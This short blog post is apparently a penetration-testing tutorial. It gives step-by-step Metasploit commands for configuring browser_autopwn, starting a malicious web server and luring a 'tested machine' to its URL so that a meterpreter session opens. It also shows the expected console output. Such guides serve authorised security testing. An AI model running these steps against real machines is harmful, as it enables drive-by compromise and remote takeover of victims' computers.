1) Enter Metasploit msfconsole:
# msfconsole
2) Select Browser Autopwn:
msf5 > use auxiliary/server/browser_autopwn
OR
msf5 > use auxiliary/server/browser_autopwn2
3) Set up corresponding settings:
msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.0.XX /*P.S.: 192.168.0.XX is the IP address of this machine.*/
msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80
msf5 auxiliary(server/browser_autopwn) > set URIPATH /
4) Start the malicious web server:
msf5 auxiliary(server/browser_autopwn) > exploit
5) Metasploit then would show you a "Local IP" URL, which should be browsed by the tested machine, as shown below:
[*] --- Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.XX:80/ /*P.S.: http://192.168.0.XX:80/ is the URL needed to be browsed by the tested machine.*/
[*] Server started.
6) If the tested machine is vulnerable, a meterpreter should be showing up shortly.
No comments:
Post a Comment